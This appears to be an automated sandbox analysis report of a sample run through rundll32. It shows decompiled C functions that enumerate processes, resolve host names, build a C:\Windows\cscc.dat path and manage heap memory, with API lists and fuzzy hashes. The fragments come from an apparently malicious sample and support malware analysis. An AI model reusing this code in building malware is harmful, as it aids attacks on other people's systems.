                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                              • Opcode ID: 046153051852df51ae2402e3c9ebbcc433d069fbd2d13009268e489f7382789b
                                                                                                                                                              • Instruction ID: b72524b0a537b3f404e0ac2e382855dd7afbbc1e66c3d04ac352ce18944c9a33
                                                                                                                                                              • Opcode Fuzzy Hash: 046153051852df51ae2402e3c9ebbcc433d069fbd2d13009268e489f7382789b
                                                                                                                                                              • Instruction Fuzzy Hash: 56016D72D412356BDA30396D9E5CEAF7658B749325F242742FD12D20D4E634E9804B91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26628(void* __ecx, void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				short _v16;
                                                                                                                                                              				short _v18;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				short _v22;
                                                                                                                                                              				short _v24;
                                                                                                                                                              				short _v26;
                                                                                                                                                              				short _v28;
                                                                                                                                                              				short _v30;
                                                                                                                                                              				short _v32;
                                                                                                                                                              				short _v34;
                                                                                                                                                              				short _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				short _v2088;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                              				short _t31;
                                                                                                                                                              				short _t32;
                                                                                                                                                              				short _t33;
                                                                                                                                                              				short _t34;
                                                                                                                                                              				short _t35;
                                                                                                                                                              				short _t36;
                                                                                                                                                              				short _t37;
                                                                                                                                                              				short _t38;
                                                                                                                                                              				short _t39;
                                                                                                                                                              				short _t40;
                                                                                                                                                              				intOrPtr* _t46;
                                                                                                                                                              				short _t53;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              
                                                                                                                                                              				_t53 = 0;
                                                                                                                                                              				 *0x4e33b90 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t29 = E04E2686C(__ecx,  &_v8, __eflags, 1);
                                                                                                                                                              				_v12 = _t29;
                                                                                                                                                              				if(_t29 != 0) {
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t31 = 0x20;
                                                                                                                                                              						_v36 = _t31;
                                                                                                                                                              						_t32 = 0x22;
                                                                                                                                                              						_v34 = _t32;
                                                                                                                                                              						_t33 = 0x25;
                                                                                                                                                              						_v32 = _t33;
                                                                                                                                                              						_t34 = 0x77;
                                                                                                                                                              						_v30 = _t34;
                                                                                                                                                              						_t35 = 0x73;
                                                                                                                                                              						_v28 = _t35;
                                                                                                                                                              						_t36 = 0x3a;
                                                                                                                                                              						_v26 = _t36;
                                                                                                                                                              						_t37 = 0x25;
                                                                                                                                                              						_v24 = _t37;
                                                                                                                                                              						_t38 = 0x77;
                                                                                                                                                              						_v22 = _t38;
                                                                                                                                                              						_t39 = 0x73;
                                                                                                                                                              						_v20 = _t39;
                                                                                                                                                              						_t40 = 0x22;
                                                                                                                                                              						_v18 = _t40;
                                                                                                                                                              						_v16 = 0;
                                                                                                                                                              						_t17 = _v8 + 4; // 0x8dc38b04
                                                                                                                                                              						wsprintfW( &_v2088,  &_v36,  *_v8,  *_t17);
                                                                                                                                                              						_t46 =  &_v2088;
                                                                                                                                                              						_t63 = _t63 + 0x10;
                                                                                                                                                              						_t56 = _t46 + 2;
                                                                                                                                                              						do {
                                                                                                                                                              							_t57 =  *_t46;
                                                                                                                                                              							_t46 = _t46 + 2;
                                                                                                                                                              						} while (_t57 != 0);
                                                                                                                                                              						_t61 = (_t46 - _t56 >> 1) + _t53;
                                                                                                                                                              						if(_t61 < 0x1ff5) {
                                                                                                                                                              							StrCatW(0x4e33b90,  &_v2088);
                                                                                                                                                              							_v40 = _t61;
                                                                                                                                                              							if(E04E26893(_t56,  &_v8) != 0) {
                                                                                                                                                              								_t53 = _v40;
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						E04E26B46(_v12);
                                                                                                                                                              						goto L8;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L8:
                                                                                                                                                              				 *0x4e33010 =  *0x4e33010 & 0;
                                                                                                                                                              				 *0x4e37b78 = 0;
                                                                                                                                                              				return 0;
                                                                                                                                                              			}




































                                                                                                                                                              0x04e2663c
                                                                                                                                                              0x04e26643
                                                                                                                                                              0x04e26649
                                                                                                                                                              0x04e2664c
                                                                                                                                                              0x04e26651
                                                                                                                                                              0x04e26656
                                                                                                                                                              0x04e26661
                                                                                                                                                              0x04e26663
                                                                                                                                                              0x04e26666
                                                                                                                                                              0x04e2666a
                                                                                                                                                              0x04e2666d
                                                                                                                                                              0x04e26671
                                                                                                                                                              0x04e26674
                                                                                                                                                              0x04e26678
                                                                                                                                                              0x04e2667b
                                                                                                                                                              0x04e2667f
                                                                                                                                                              0x04e26682
                                                                                                                                                              0x04e26686
                                                                                                                                                              0x04e26689
                                                                                                                                                              0x04e2668d
                                                                                                                                                              0x04e2668e
                                                                                                                                                              0x04e26694
                                                                                                                                                              0x04e26695
                                                                                                                                                              0x04e2669b
                                                                                                                                                              0x04e2669c
                                                                                                                                                              0x04e266a2
                                                                                                                                                              0x04e266a3
                                                                                                                                                              0x04e266a9
                                                                                                                                                              0x04e266b0
                                                                                                                                                              0x04e266c0
                                                                                                                                                              0x04e266c6
                                                                                                                                                              0x04e266cc
                                                                                                                                                              0x04e266cf
                                                                                                                                                              0x04e266d2
                                                                                                                                                              0x04e266d2
                                                                                                                                                              0x04e266d5
                                                                                                                                                              0x04e266d8
                                                                                                                                                              0x04e266e1
                                                                                                                                                              0x04e266ea
                                                                                                                                                              0x04e266f8
                                                                                                                                                              0x04e26701
                                                                                                                                                              0x04e26714
                                                                                                                                                              0x04e2665e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2665e
                                                                                                                                                              0x04e26714
                                                                                                                                                              0x04e2671d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2671d
                                                                                                                                                              0x04e26661
                                                                                                                                                              0x04e26723
                                                                                                                                                              0x04e26725
                                                                                                                                                              0x04e2672c
                                                                                                                                                              0x04e26734

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wsprintf
                                                                                                                                                              • String ID: pGdv0Hcv
                                                                                                                                                              • API String ID: 2111968516-3560805785
                                                                                                                                                              • Opcode ID: 129ad34b145bfcbee9729c7d35eb428c62440751d8bf6ba26ab451523a5c6f9c
                                                                                                                                                              • Instruction ID: 40b44614cc779e14ab4812a4ff44704f82686362f907c15d58a3455e5923758b
                                                                                                                                                              • Opcode Fuzzy Hash: 129ad34b145bfcbee9729c7d35eb428c62440751d8bf6ba26ab451523a5c6f9c
                                                                                                                                                              • Instruction Fuzzy Hash: 11317036D10219AAEB00CFE4EA55AAD73B4FF08715F106496D904EB250E7B5AF408795
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E04E29332(void* __eax, CHAR* _a4) {
                                                                                                                                                              				void* _t16;
                                                                                                                                                              
                                                                                                                                                              				_t16 = 0;
                                                                                                                                                              				__imp__#52(_a4);
                                                                                                                                                              				if(__eax != 0) {
                                                                                                                                                              					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
                                                                                                                                                              					_t16 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				return _t16;
                                                                                                                                                              			}




                                                                                                                                                              0x04e29339
                                                                                                                                                              0x04e2933b
                                                                                                                                                              0x04e29343
                                                                                                                                                              0x04e29365
                                                                                                                                                              0x04e2936e
                                                                                                                                                              0x04e2936e
                                                                                                                                                              0x04e29373

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: gethostbynamewsprintf
                                                                                                                                                              • String ID: %u.%u.%u.%u
                                                                                                                                                              • API String ID: 3411498959-1542503432
                                                                                                                                                              • Opcode ID: 658e6830766d9f1ac4d824e5c71226dfd510b5a78316b9b033f0ba2e4fa78335
                                                                                                                                                              • Instruction ID: cf748353c648e73a7590e4f4d4f0bc6e71a5ae7152bc1d9d7c26d88a2ef8f72e
                                                                                                                                                              • Opcode Fuzzy Hash: 658e6830766d9f1ac4d824e5c71226dfd510b5a78316b9b033f0ba2e4fa78335
                                                                                                                                                              • Instruction Fuzzy Hash: 61E092B12040646FC3191B5ADC5CC36FFECDF0965370941DAFA89CB172C229EA20EBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E27E69(WCHAR* _a4) {
                                                                                                                                                              				void* _t4;
                                                                                                                                                              
                                                                                                                                                              				_t4 = 0;
                                                                                                                                                              				if(PathCombineW(_a4, L"C:\\Windows\\", L"cscc.dat") != 0) {
                                                                                                                                                              					_t4 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				return _t4;
                                                                                                                                                              			}




                                                                                                                                                              0x04e27e7a
                                                                                                                                                              0x04e27e84
                                                                                                                                                              0x04e27e86
                                                                                                                                                              0x04e27e86
                                                                                                                                                              0x04e27e8b

                                                                                                                                                              APIs
                                                                                                                                                              • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04E27EA6,?), ref: 04E27E7C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CombinePath
                                                                                                                                                              • String ID: C:\Windows\$cscc.dat
                                                                                                                                                              • API String ID: 3422762182-1946977352
                                                                                                                                                              • Opcode ID: 66bb11ff01f2bf3ce6160bd18429d843eb793e756ad79c88edb549164b577d8a
                                                                                                                                                              • Instruction ID: 0972877f9f7bd0b5abc3cfa052f0b0f4271523493447a993b1c47d00c07c27ac
                                                                                                                                                              • Opcode Fuzzy Hash: 66bb11ff01f2bf3ce6160bd18429d843eb793e756ad79c88edb549164b577d8a
                                                                                                                                                              • Instruction Fuzzy Hash: 28C080723C02393385531DD65D09D57FE9CEB15EE37009121FA05D1004C5E6EC10C6E4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26CED(signed int _a4, intOrPtr _a8) {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				signed int* _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              
                                                                                                                                                              				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                              				if(_t11 != 0) {
                                                                                                                                                              					 *_t11 =  *_t11 & 0x00000000;
                                                                                                                                                              					_t11[1] = _a4;
                                                                                                                                                              					if(E04E26D35(_t11, _t13, _a8) == 0) {
                                                                                                                                                              						_t11 = 0;
                                                                                                                                                              						HeapFree(GetProcessHeap(), 0, 0);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              			}






                                                                                                                                                              0x04e26d05
                                                                                                                                                              0x04e26d09
                                                                                                                                                              0x04e26d11
                                                                                                                                                              0x04e26d14
                                                                                                                                                              0x04e26d1e
                                                                                                                                                              0x04e26d21
                                                                                                                                                              0x04e26d27
                                                                                                                                                              0x04e26d27
                                                                                                                                                              0x04e26d1e
                                                                                                                                                              0x04e26d32

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,74654F20,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26CFC
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26CFF
                                                                                                                                                                • Part of subcall function 04E26D35: EnterCriticalSection.KERNEL32(?,74654F20,?,04E26D1C,?,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D46
                                                                                                                                                                • Part of subcall function 04E26D35: LeaveCriticalSection.KERNEL32(?,?,04E26D1C,?,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D7F
                                                                                                                                                                • Part of subcall function 04E26D35: Sleep.KERNEL32(00002710,?,04E26D1C,?,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D97
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D24
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D27
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2739146912-0
                                                                                                                                                              • Opcode ID: cbdc189a66a0fd0ee1d536a1928ab9f780da84e3f8d09482d1502e7eb058d71c
                                                                                                                                                              • Instruction ID: f1e4d0208c384c35ffc568f1117e85e6b1abc4a5ba0d47d34e018358a63b32e3
                                                                                                                                                              • Opcode Fuzzy Hash: cbdc189a66a0fd0ee1d536a1928ab9f780da84e3f8d09482d1502e7eb058d71c
                                                                                                                                                              • Instruction Fuzzy Hash: F7E0657220030D6BEB206FF69EC4F17BB9CFB94315F018126F6008A145DA75E8048B20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2682F(void** _a4) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t4;
                                                                                                                                                              				void** _t7;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              
                                                                                                                                                              				_t7 = _a4;
                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                              					_t4 =  *_t7;
                                                                                                                                                              					if(_t4 != 0) {
                                                                                                                                                              						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
                                                                                                                                                              					}
                                                                                                                                                              					_t8 = _t7[1];
                                                                                                                                                              					if(_t8 != 0) {
                                                                                                                                                              						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
                                                                                                                                                              					}
                                                                                                                                                              					return _t4;
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}







                                                                                                                                                              0x04e26833
                                                                                                                                                              0x04e26838
                                                                                                                                                              0x04e2683a
                                                                                                                                                              0x04e2684c
                                                                                                                                                              0x04e26854
                                                                                                                                                              0x04e26854
                                                                                                                                                              0x04e26856
                                                                                                                                                              0x04e2685b
                                                                                                                                                              0x04e26863
                                                                                                                                                              0x04e26863
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26866
                                                                                                                                                              0x04e26869

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000), ref: 04E26851
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E26854
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E26860
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E26863
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                              • Opcode ID: 459a94151d9e64ed0c9fff220596d8f4cd7a70bd64addf7f8c686bdfe4061725
                                                                                                                                                              • Instruction ID: 639adca9418a8d43b8409baf560f6548bcab9fe1c7f33c2149d87c4c204e9b5d
                                                                                                                                                              • Opcode Fuzzy Hash: 459a94151d9e64ed0c9fff220596d8f4cd7a70bd64addf7f8c686bdfe4061725
                                                                                                                                                              • Instruction Fuzzy Hash: B9E0127270036867EA249EE7AEC4F17B79CDB94755F054136E704D7140D565E8008AB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%